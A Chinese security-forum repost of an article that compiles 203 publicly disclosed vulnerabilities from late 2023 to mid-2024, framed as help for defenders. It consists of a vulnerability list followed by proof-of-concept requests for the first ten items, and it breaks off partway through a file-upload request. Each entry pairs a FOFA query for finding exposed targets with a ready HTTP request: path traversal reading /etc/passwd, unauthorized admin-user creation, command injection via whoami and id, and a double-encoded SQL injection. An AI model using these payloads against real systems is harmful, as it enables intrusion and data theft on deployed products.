找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 478|回复: 0

互联网公开漏洞整理202309-202406--转载

[复制链接]
发表于 2024-6-5 14:31:29 | 显示全部楼层 |阅读模式
互联网公开漏洞整理202309-202406* D7 {/ r# L/ t3 J" w! |
道一安全 2024-06-05 07:41 北京
& Y$ F2 x& A, v0 e4 a# [. q, c以下文章来源于网络安全新视界 ,作者网络安全新视界
% M9 ]; o* }% M% N3 [/ q( t, J; Z9 U
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。  U% i% h9 L9 _5 X7 Y
/ C% @! a$ v+ z) I8 w. e' t2 g
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。. w7 p. G" a' l( B: V5 V0 q6 N
+ ~# d  E- h; `% W4 z
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
7 |- A* t9 p8 r8 q6 z7 ]! D3 _% ~" V* W5 |7 u/ B
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
! M0 m& o, S  W' b$ G4 O5 K1 U+ g! A. x% M$ L: k
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。) l: T1 Q# y5 j) G! Q/ }
: V; X! ~8 ~: x0 M, b0 N# r

+ o  T& \( Z/ K声明, J" m. L9 R) H9 u, M

! ?; T' u- I+ X" I. T& v为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
% D+ e3 w; U. j% S# ^* u0 m
7 D; X3 {7 c/ x1 X9 {% r) }0 F有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。3 z5 ^7 c6 D* W# b* [8 ~3 A  a

5 ~# T: [6 k  g3 B8 d/ v3 o( s- h5 p( K% \, T" I2 Y

( f* H9 d& r6 `2 _6 m  R目录
+ Q3 V( T* r) e, O0 V  ?2 H) l1 Z: ^/ y& w7 i, ]) r2 x
01- s# t0 |% ~  P3 [
  |8 \, ]: l4 t, L# W+ ]
1. StarRocks MPP数据库未授权访问4 r* v# G4 L' k1 v
2. Casdoor系统static任意文件读取2 }; g5 N8 G3 v) k9 i, ~
3. EasyCVR智能边缘网关 userlist 信息泄漏
6 a# X( [% V4 l" A# n* N1 b4. EasyCVR视频管理平台存在任意用户添加  O; E9 Y; {2 N1 c7 C2 F& z: [1 ~
5. NUUO NVR 视频存储管理设备远程命令执行
5 W/ E7 |0 M" K. e6. 深信服 NGAF 任意文件读取
, K& K8 v6 R  ^, r6 S6 ?/ N9 A3 f7. 鸿运主动安全监控云平台任意文件下载
- K3 m! y# U) D8 e( K3 @8. 斐讯 Phicomm 路由器RCE# g  z6 B5 c. {5 ]; ?" @
9. 稻壳CMS keyword 未授权SQL注入/ u6 }2 G3 w+ f  z3 X
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传4 Z* Y( v' s0 C" J( ]6 G
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入7 d$ ^$ a" i4 e) d' z7 m- Q6 u
12. Jorani < 1.0.2 远程命令执行
6 p: x1 m" Z2 O" o$ W" W13. 红帆iOffice ioFileDown任意文件读取. u! t0 J4 v3 z% T0 x6 B
14. 华夏ERP(jshERP)敏感信息泄露
# M, B6 E& ^( Y9 \+ _. \0 e15. 华夏ERP getAllList信息泄露8 F* @8 s2 T1 N1 N7 R* m3 V- u9 I
16. 红帆HFOffice医微云SQL注入6 P( O8 Z+ v) Z) V5 n
17. 大华 DSS itcBulletin SQL 注入
/ K8 O2 v; @  {- v8 Q& O5 V18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
! @; h1 f) L2 d1 U19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入6 E0 G. p% V; D$ U
20. 大华ICC智能物联综合管理平台任意文件读取
! k0 ]/ `* c1 Y* X6 I2 b21. 大华ICC智能物联综合管理平台random远程代码执行3 {! x  A) E$ r7 C
22. 大华ICC智能物联综合管理平台 log4j远程代码执行3 @  M7 W( W- I6 N# p* n; f( E
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
# V$ B1 s; c- x8 w6 |24. 用友NC 6.5 accept.jsp任意文件上传
, j- B4 O' {! V6 u! K% a7 R25. 用友NC registerServlet JNDI 远程代码执行
# V3 [: f# i& V+ _8 k4 s% G" ^8 ~( A26. 用友NC linkVoucher SQL注入( P9 v7 Z  z8 v, X
27. 用友 NC showcontent SQL注入
$ A8 G" u# G4 E  D; [" ]1 ~28. 用友NC grouptemplet 任意文件上传
( G# D. b) b  d9 [  x29. 用友NC down/bill SQL注入
# F1 l9 z* v' w3 P30. 用友NC importPml SQL注入/ F' h* }3 B: \  h
31. 用友NC runStateServlet SQL注入
% G# d' R7 D  z5 o, j4 y- s/ S2 M6 l32. 用友NC complainbilldetail SQL注入7 Q2 x3 V+ @* u0 z1 I9 A
33. 用友NC downTax/download SQL注入
& l" U; t3 i8 l1 ]/ r: J34. 用友NC warningDetailInfo接口SQL注入
- U& B; I2 D% n. ^35. 用友NC-Cloud importhttpscer任意文件上传
0 Q) u0 ^8 e; N8 |36. 用友NC-Cloud soapFormat XXE2 P, H9 J1 J3 [% X; @( @
37. 用友NC-Cloud IUpdateService XXE
: ], V7 N- K  c38. 用友U8 Cloud smartweb2.RPC.d XXE
, a8 {' {# c! [) M$ I+ D39. 用友U8 Cloud RegisterServlet SQL注入
6 P4 [) \4 V" b% L. Y' [5 b% h: O40. 用友U8-Cloud XChangeServlet XXE# d6 ?  s8 x9 f- O/ K. o. |8 [
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
3 p2 E! w9 r; P- G/ M9 Q42. 用友GRP-U8 SmartUpload01 文件上传( U+ X& h' U# n3 n: o; N
43. 用友GRP-U8 userInfoWeb SQL注入致RCE+ P' R  ?1 ?1 d8 ^! ^& p
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
* z- b. Q! x. c8 l, V$ U$ G, m45. 用友GRP-U8 ufgovbank XXE3 e- d* P, G' d# O! W; J, U6 _# c
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
& N5 Y: \, q( n* c$ U- m+ Y0 n47. 用友GRP A++Cloud 政府财务云 任意文件读取' m. b% S' f5 f) @$ S! G
48. 用友U8 CRM swfupload 任意文件上传
9 b- i9 _/ r1 D( }* H4 c49. 用友U8 CRM系统uploadfile.php接口任意文件上传+ B% ^, j5 b( a- t3 J0 @$ j/ i& l0 d+ B
50. QDocs Smart School 6.4.1 filterRecords SQL注入
5 {2 r' }  ^$ w: J! C51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入* `( Z# g& Q0 W+ ?  [1 \5 ^
52. 泛微E-Office json_common.php sql注入
( H6 _; [" c9 m: e$ W( I* p53. 迪普 DPTech VPN Service 任意文件上传- g1 f4 s3 k! e0 v. N( I
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
* R, w2 f, a6 O" W: g: d5 Q. `55. 畅捷通T+ getdecallusers信息泄露& h" C, T4 [: t( ^+ U4 |
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE! i% l. `9 e  `, ]) o- n/ O
57. 畅捷通T+ keyEdit.aspx SQL注入
- e- l' w4 J* B  `0 C0 f58. 畅捷通T+ KeyInfoList.aspx sql注入. p% j, y3 d! s
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行; p. C! M0 X7 b
60. 百卓Smart管理平台 importexport.php SQL注入# y8 C( m9 j9 T: L- Q
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
0 j+ ]/ n3 f! M3 z4 d/ k: B; ~, e6 a62. IP-guard WebServer 远程命令执行( M$ Q; i0 U1 `
63. IP-guard WebServer任意文件读取
4 _/ D& i' f: q" j. u) z9 W64. 捷诚管理信息系统CWSFinanceCommon SQL注入
( h$ |* {# M  [4 H65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
' {2 c& I- t7 P* H8 z66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入( I( \) B- y& Y# j+ O
67. 万户ezOFFICE wpsservlet任意文件上传
3 E5 j; u' E* H  m0 _68. 万户ezOFFICE wf_printnum.jsp SQL注入0 [. w' K7 Z, d2 p( F( Y0 R
69. 万户 ezOFFICE contract_gd.jsp SQL注入
" t" t. w$ e6 p" H70. 万户ezEIP success 命令执行4 N5 Z" [5 P3 |( _8 ^- ~9 q8 t
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入6 s4 {7 v2 U2 y: X' U' N: _3 L% i
72. 致远OA getAjaxDataServlet XXE' n  @2 p+ c8 j' |+ c( L8 o
73. GeoServer wms远程代码执行
2 L7 B, d! w2 D. }- X2 u74. 致远M3-server 6_1sp1 反序列化RCE( T2 s; k% C2 S" z- n, M
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
6 V3 H1 I* w) j, ~2 c  `' i76. 新开普掌上校园服务管理平台service.action远程命令执行
  t1 N) l) f* ^3 ~9 l  @: J77. F22服装管理软件系统UploadHandler.ashx任意文件上传$ Q- O4 d* Y( q/ A7 N
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
" T" m- F1 l4 G! Y4 n) }# _4 h4 ]79. BYTEVALUE 百为流控路由器远程命令执行
, T+ @. @& {- h" f6 M80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传- g  q3 A3 }5 q5 @
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
3 f5 U7 Z( q; [6 `82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
- z1 q8 t% E0 A3 O83. JeecgBoot testConnection 远程命令执行
8 A: j/ [! ?" J( u* J$ @' m/ ~84. Jeecg-Boot JimuReport queryFieldBySql 模板注入( q3 J  [! ?/ _) Z
85. SysAid On-premise< 23.3.36远程代码执行* @: S. K. z: s# F3 m
86. 日本tosei自助洗衣机RCE
7 t. o3 H1 d: Y87. 安恒明御安全网关aaa_local_web_preview文件上传5 m5 d/ m: W" T# ^+ B
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
: M+ c# h# f' E; P7 k5 E89. 致远互联FE协作办公平台editflow_manager存在sql注入9 `4 J7 x  r5 k
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行  d/ d' X% q: p  k) h) F7 s2 F% `6 n
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
/ ]' p* b, ^) X5 d, Z" L92. 海康威视运行管理中心session命令执行
9 X8 Z9 T, ~9 `% o) B5 P93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
3 T6 B7 w' C; b6 S94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传# i3 \0 w8 C' m! Z- F! C" w- h; [) {6 d
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
0 }( f7 P% Q8 t) ~. K4 v, j96. Apache OFBiz  18.12.11 groovy 远程代码执行, t4 k) w* U$ W1 V& U) R
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
$ m, h5 y0 z( N$ f: Y98. SpiderFlow爬虫平台远程命令执行
, L9 l4 z* C+ C& \- f; F) A8 r, w99. Ncast盈可视高清智能录播系统busiFacade RCE3 Q* @0 F6 W- ], A. G# q
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
% R6 d9 P. k* O4 |: b5 @101. ivanti policy secure-22.6命令注入6 ~, V# B) ?) Z( ]8 c$ [) Q
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
9 v& _; j$ d6 r8 ^  ^103. Ivanti Pulse Connect Secure VPN XXE( B- D: [6 B+ l, g% b/ w/ I+ W' l1 G
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露+ }: ]) E+ {" `, ]* e( B
105. SpringBlade v3.2.0 export-user SQL 注入
( x) s" q  r! F, V3 J106. SpringBlade dict-biz/list SQL 注入! c2 K/ f5 e/ i3 z& ]
107. SpringBlade tenant/list SQL 注入/ _$ y# N* H6 k3 j
108. D-Tale 3.9.0 SSRF
8 r+ v0 W7 n" y& {6 E% l109. Jenkins CLI 任意文件读取1 R+ H6 a1 G0 s3 ~/ `  M
110. Goanywhere MFT 未授权创建管理员
5 ?6 S7 g/ C1 t8 h9 O111. WordPress Plugin HTML5 Video Player SQL注入( y4 I/ K9 F7 U! _; t8 e
112. WordPress Plugin NotificationX SQL 注入3 C) d. s. b# y/ d2 q+ Q7 M
113. WordPress Automatic 插件任意文件下载和SSRF
; B, Y4 @* V5 h. ]114. WordPress MasterStudy LMS插件 SQL注入
, n' e& c! Q2 c/ |% ]1 }- O/ v; t; w115. WordPress Bricks Builder <= 1.9.6 RCE
5 y2 u* _! L/ I! H) ]: W116. wordpress js-support-ticket文件上传1 }" ^$ C' i% x3 q# I3 G) q
117. WordPress LayerSlider插件SQL注入
; l. S' {! d. |- ]5 M" ?118. 北京百绰智能S210管理平台uploadfile.php任意文件上传- R1 @$ U% _7 ]" p0 w1 @; w
119. 北京百绰智能S20后台sysmanageajax.php sql注入
$ w) y! S  h' Q: {4 W& ]  W120. 北京百绰智能S40管理平台导入web.php任意文件上传/ \% D" d$ }, s! E
121. 北京百绰智能S42管理平台userattestation.php任意文件上传' t, @! r1 V% v4 a5 K! J/ f
122. 北京百绰智能s200管理平台/importexport.php sql注入
+ [, C5 a1 x3 Y4 b$ F. T123. Atlassian Confluence 模板注入代码执行4 y1 K) @# n" c/ ~$ y
124. 湖南建研工程质量检测系统任意文件上传; i& f% Z/ M) ~  @/ U) V
125. ConnectWise ScreenConnect身份验证绕过
9 d: X  [' X4 [; l  h126. Aiohttp 路径遍历7 M6 G7 w7 n6 w8 `+ ^
127. 广联达Linkworks DataExchange.ashx XXE" ~. O' n3 P3 F! p9 u$ r
128. Adobe ColdFusion 反序列化1 _: [& B) |3 b; ^$ s. @; `
129. Adobe ColdFusion 任意文件读取
: A! R6 o. F* V: u& [, f130. Laykefu客服系统任意文件上传
0 N" [9 b' J& O1 T6 K* M3 z/ B131. Mini-Tmall <=20231017 SQL注入7 c% L! G* w) R& e# L
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过3 W& H' V$ e: X7 o3 z3 [0 m
133. H5 云商城 file.php 文件上传
# T; n& v, s1 ]; m134. 网康NS-ASG应用安全网关index.php sql注入9 I: m8 A, k- \  S. p: ]
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入& e; _, ^. q9 d+ g- c& x4 W: f
136. NextChat cors SSRF2 @, ?6 F! o: F3 z. d6 q
137. 福建科立迅通信指挥调度平台down_file.php sql注入  o5 W3 F4 ]1 [$ Y7 _1 N3 w
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
0 C$ q; n1 \. T. I$ E139. 福建科立讯通信指挥调度平台editemedia.php sql注入
# R8 a: C( p; U5 R  H140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
* c/ S/ K; H- T& \( z141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
# W% Q2 V, L7 c* Y. T, ^5 q142. CMSV6车辆监控平台系统中存在弱密码
$ _; f9 _7 P/ j4 c143. Netis WF2780 v2.1.40144 远程命令执行4 D# p: m% F5 j% I- H
144. D-Link nas_sharing.cgi 命令注入- X6 k7 E- d4 q! @$ D7 O/ K& c
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入/ D& M- Q" s8 A, a' M% N
146. MajorDoMo thumb.php 未授权远程代码执行
0 m& G3 ~+ ^- w" u) O  S147. RaidenMAILD邮件服务器v.4.9.4-路径遍历% l/ o# M7 C. F1 J% |
148. CrushFTP 认证绕过模板注入3 N- \/ w0 n- {
149. AJ-Report开源数据大屏存在远程命令执行& g8 ]: y4 @6 y) C7 e
150. AJ-Report 1.4.0 认证绕过与远程代码执行! `1 V: J, o% @: b! U& k
151. AJ-Report 1.4.1 pageList sql注入
% M7 n% o3 R1 `- P# V# V152. Progress Kemp LoadMaster 远程命令执行
% n- y( G" N7 o2 b( [0 F( M153. gradio任意文件读取1 t( C1 O' [3 I8 @
154. 天维尔消防救援作战调度平台 SQL注入8 ~3 D5 g& u& U5 I  ^! u
155. 六零导航页 file.php 任意文件上传
% }$ G  T' D! a( o! m' T156. TBK DVR-4104/DVR-4216 操作系统命令注入# O' n+ N4 t6 {) U+ l! o( |. \
157. 美特CRM upload.jsp 任意文件上传6 N2 w" Q6 K% t- o9 W" U7 @
158. Mura-CMS-processAsyncObject存在SQL注入
0 J5 ?/ g7 |; ~4 c6 j1 Z159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
% E$ B, }$ D5 j4 {, s160. Sonatype Nexus Repository 3目录遍历与文件读取2 ]% g6 B4 r4 b/ z  O
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传% E. ?6 \' l9 `! [8 z8 U
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
6 I3 l4 x  S8 K: C& Y# k2 h163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
) y6 a/ X% _( j' g' x1 o0 @164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
$ I  h) Y& w+ P5 d! g% u165. OrangeHRM 3.3.3 SQL 注入
: A' ?. y  v% I; ]6 Z8 P3 v1 c166. 中成科信票务管理平台SeatMapHandler SQL注入
6 n9 ]0 {7 J5 d9 z167. 精益价值管理系统 DownLoad.aspx任意文件读取
: x# b$ [, \9 y, f/ W& ?; ]+ v* Q168. 宏景EHR OutputCode 任意文件读取
- V6 ^! G6 r! s- y9 b' f169. 宏景EHR downlawbase SQL注入: u5 T3 U  m1 O( h0 |5 \
170. 宏景EHR DisplayExcelCustomReport 任意文件读取1 ?  U. l: L% D6 _$ t* t* C5 l" E
171. 通天星CMSV6车载定位监控平台 SQL注入
8 ~2 J) A% j3 {  Z$ y172. DT-高清车牌识别摄像机任意文件读取
" Y9 K1 o- o# V3 }+ B( k* c( P+ K173. Check Point 安全网关任意文件读取4 T: o! d. b# D$ x+ q5 `0 Y
174. 金和OA C6 FileDownLoad.aspx 任意文件读取" ~, O  Q# {" }- i) n% s/ U. R
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
( y3 k: D6 l5 |& B176. 电信网关配置管理系统 rewrite.php 文件上传$ `; S& y1 A$ v7 i/ G/ t
177. H3C路由器敏感信息泄露
* S& W& D% S. P* t178. H3C校园网自助服务系统-flexfileupload-任意文件上传
2 g8 g/ k- r% Z+ Z4 u2 n+ m179. 建文工程管理系统存在任意文件读取% e5 e) f0 K5 {: u
180. 帮管客 CRM jiliyu SQL注入4 f2 ]0 u3 r$ o9 l4 z8 D1 x! D
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入2 w; j, U5 g! D5 b' D* l* l
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
) o9 ?+ R8 k: S" i- ^* L$ R183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入5 h+ I) ?6 }4 ]  h
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
( T8 Y7 {/ [' Y185. 瑞友天翼应用虚拟化系统SQL注入
. w# R1 u" I1 h) e186. F-logic DataCube3 SQL注入
$ Z: u; X( V4 R% i+ j0 j% \, k187. Mura CMS processAsyncObject SQL注入
) K9 Z7 c% w: z0 ~- S188. 叁体-佳会视频会议 attachment 任意文件读取
- y) D6 p4 j* Y1 C" b189. 蓝网科技临床浏览系统 deleteStudy SQL注入! y5 q5 x6 n1 [7 l
190. 短视频矩阵营销系统 poihuoqu 任意文件读取. t, H% T. {' O2 q; g. P4 F$ D8 [
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
0 U8 [6 I& a/ y6 s& k192. 富通天下外贸ERP UploadEmailAttr 任意文件上传0 m/ `1 W0 F/ H1 H
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行9 A# z% ]6 R' K$ x. P( @. o
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
4 P, s1 v6 G; y* `3 G. l& l195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
2 A/ n# Q+ \, L0 Y7 i2 ~. Y- l196. 河南省风速科技统一认证平台密码重置* z: f3 |+ i! E9 L
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
6 T9 L4 ^3 h! T2 W5 \- m, I* H6 J198.  阿里云盘 WebDAV 命令注入" ~( _. c' w; K. D; W+ h# H6 A
199. cockpit系统assetsmanager_upload接口 文件上传
  o+ O; E# U0 t200. SeaCMS海洋影视管理系统dmku SQL注入
+ `6 z: I) e6 Y201. 方正全媒体新闻采编系统 binary SQL注入$ ?5 q3 W% J$ z# E( D- P$ ~! t
202. 微擎系统 AccountEdit任意文件上传
- ^, K% ~; p" C! E, K203. 红海云EHR PtFjk 文件上传; Z+ x* W7 x) Y7 M; P6 y2 ?* I2 g
9 l0 F4 u* {8 d0 i/ F
POC列表" T  O* B, u, b* C8 K6 R7 }2 _8 F
2 U: V  S# K  q- [8 W- _! H! c8 h  L/ K
026 f4 \) b, I/ y- a

$ q9 J& P2 G5 W# U6 [1. StarRocks MPP数据库未授权访问8 [/ S0 K6 M7 r  J. x
FOFA :title="StarRocks"8 O8 i( f9 O9 @; u' a7 ]+ u" U4 F
GET /mem_tracker HTTP/1.1+ D5 \) y! [) s
Host: URL
  ]7 G$ Q+ g" e& ], f9 W) B
' [6 Q* d& Y. z8 a' F1 b  W& H' V0 N, n8 j9 L6 d9 a
2. Casdoor系统static任意文件读取
4 r0 E* X$ a' @9 s; V6 EFOFA :title="Casdoor". i- m- m8 V  J/ C% n5 ?; q
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
: H/ ~  T: v$ H' ?+ Q- D# t3 D7 MHost: xx.xx.xx.xx:99998 i( Z( M+ q3 Z2 {% G
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# h1 A2 C- n9 ]) }4 n' K
Connection: close
* `1 x/ \1 ^6 v3 t5 b4 UAccept: */*8 t# W5 E8 b; j3 Z; _
Accept-Language: en
4 z+ C1 z+ K+ F& n; |8 \9 gAccept-Encoding: gzip/ w; X; B! ]1 b! g& a8 Z4 p

; v; p2 V  K% E- I& ~. z+ w0 n0 A: k# d
3. EasyCVR智能边缘网关 userlist 信息泄漏
( H1 l: G% H3 C: _8 [FOFA :title="EasyCVR"& ]  U3 G! M3 i" V6 Z0 E0 M" A
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
( R; n* Y! p: d" j* }7 BHost: xx.xx.xx.xx, q+ X0 t2 Q1 ?; \" O! o. X
1 M1 {5 z5 c$ b. ^% n
3 u2 Y4 |6 q' p
4. EasyCVR视频管理平台存在任意用户添加2 e( K6 p- ^$ v+ D
FOFA :title="EasyCVR"
. C9 c, V# }! w
" ~- [, P9 L% K8 ]password更改为自己的密码md5- t6 f7 j+ `; Q' l5 ]6 E
POST /api/v1/adduser HTTP/1.1
, q$ S8 n! I6 g$ QHost: your-ip
, z6 f3 |+ J! s5 ]Content-Type: application/x-www-form-urlencoded; charset=UTF-88 }+ c) ]; B3 _
. q) y' E7 I0 [  |( h
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
& w5 F" Z0 J& s& o) O! h; ~$ c* f/ f+ ~+ b
: _9 E2 H5 y. g$ M# j
5. NUUO NVR 视频存储管理设备远程命令执行- X8 H+ j" Z5 T3 }6 R
FOFA:title="Network Video Recorder Login"
, R- ~& C, m( i- z# `GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1# ^# T3 `) n. L' a: Q
Host: xx.xx.xx.xx
2 E* L6 E! x) y+ j6 j+ w: U/ d: }& i$ s% g, z0 D  x
4 M3 z! R; X) V5 Y1 S( a
6. 深信服 NGAF 任意文件读取5 E" ]3 V; s7 H, H+ _
FOFA:title="SANGFOR | NGAF"
0 _, I, D$ r6 _: \; W9 Q2 v# q( wGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1: O+ |" J, W, L- k7 L, Z9 F
Host:
% [) J6 Z0 J4 X& g& K& V9 Q4 [+ {* j( Z

1 v% u  A8 w0 Q) @1 C1 K3 F7. 鸿运主动安全监控云平台任意文件下载' |# @& o5 I  D4 H  T% _
FOFA:body="./open/webApi.html"2 Z2 D* y0 x0 W+ w; T3 b
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
; M1 k1 M; L3 o5 \Host:
; a% Q, v0 Z/ @7 b% j& O& \1 h2 y, H& d! G1 b; D, p9 B  [
1 U7 f: |6 d3 J: l7 Y  m, H' |
8. 斐讯 Phicomm 路由器RCE
" }& \% O" R  ~% UFOFA:icon_hash="-1344736688"  M, P; t2 R- O/ E
默认账号admin登录后台后,执行操作+ }2 ~8 h# t) {; s% a2 w4 f
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
& o! G% ?2 w( ?4 I' \: iHost: x.x.x.x  Z; r+ h% L/ K9 H# B+ v) U
Cookie: sysauth=第一步登录获取的cookie
  R# u- C3 E* G/ \, }; J0 XContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz9 r+ A" m' i$ O. u* C0 t( u1 l/ s
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36+ j" B, \! D  W  \% g9 A* n! {6 g
4 s! @3 m2 S% E" _! g
------WebKitFormBoundaryxbgjoytz1 w3 d" P% m8 @
Content-Disposition: form-data; name="wifiRebootEnablestatus"
0 i7 |! t3 q# s
! `" V6 @; g1 n, f1 m%s
$ R0 M4 e2 ~6 {! S4 u3 M3 s- y------WebKitFormBoundaryxbgjoytz
. O( _( _. `" o7 _0 z4 pContent-Disposition: form-data; name="wifiRebootrange"9 A6 |: ~& f) \) X2 ^

3 X) U1 n0 V+ [2 \3 J, C# j12:00; id;
2 a8 ^9 L1 d+ E1 k9 t8 Q------WebKitFormBoundaryxbgjoytz- J4 P. u9 o% n/ T$ ^6 z, M
Content-Disposition: form-data; name="wifiRebootendrange"; ?* m4 E. ~/ W& S* G
$ h- X& z% e- O, D( Y% f4 y6 q) h' s
%s:
4 c- D1 S; ^. F! q------WebKitFormBoundaryxbgjoytz
& L  F$ l* V/ b1 z+ AContent-Disposition: form-data; name="cururl2"6 M. `- u% h2 a

+ f* N  X1 W6 P+ l7 `/ _# x: N  z  K+ W8 \
------WebKitFormBoundaryxbgjoytz--
) y: I5 M- w, \# [/ g
( t$ e  K- v4 b7 b. {8 u2 ^% z9 P8 q. E9 M
9. 稻壳CMS keyword 未授权SQL注入
. f$ L) a+ ^# E: N& T* |/ X8 I$ W  ZFOFA:app="Doccms"( F5 W/ {6 @% b: X
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
, F% C2 O6 n/ l' \% ~Host: x.x.x.x' X( J" j8 s" a" K: a& N- S
1 ^, c2 U' ]: E" U4 X

3 H1 ]" j' x9 F5 V* R1 {" f! Kpayload为下列语句的二次Url编码
7 ?5 [; u% G& ?: o8 @/ p0 S
9 h0 f3 z" U2 v6 Z* c' z' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
) c  h. Y6 A' t9 m2 d: L7 Y9 K% ]% o
% m# ^8 w9 n6 d6 ], j  D10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
. R' [/ [5 r$ ^% h; ^9 mFOFA:icon_hash="953405444"
8 K& D8 i  u& z( m$ c/ g7 _( F1 i
文件上传后响应中包含上传文件的路径, O, y0 P$ c) X: m6 l+ \
POST /eis/service/api.aspx?action=saveImg HTTP/1.11 ~, b2 z1 y& L) x( T9 h
Host: x.x.x.x:xx* k- ]7 ^* s' t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36! y( }) J( j, \2 N
Content-Length: 197
( g  K; N: J6 Q2 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.94 w. c+ x/ C" I2 t7 ^
Accept-Encoding: gzip, deflate
0 a5 v' O$ v, {8 i# [$ g7 x; jAccept-Language: zh-CN,zh;q=0.99 L$ o0 ]$ `4 s' ~/ X
Connection: close0 _) L2 ]3 Z) e7 x4 A2 s8 t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu6 {2 n- l9 T7 X* d- W

( v' u9 S; S" D! S4 [* d4 c9 U9 m------WebKitFormBoundaryxdgaqmqu1 f9 i# a" R# m7 X
Content-Disposition: form-data; name="file"filename="icfitnya.txt"" \% P* h4 r5 U8 A5 V; @% l
Content-Type: text/html
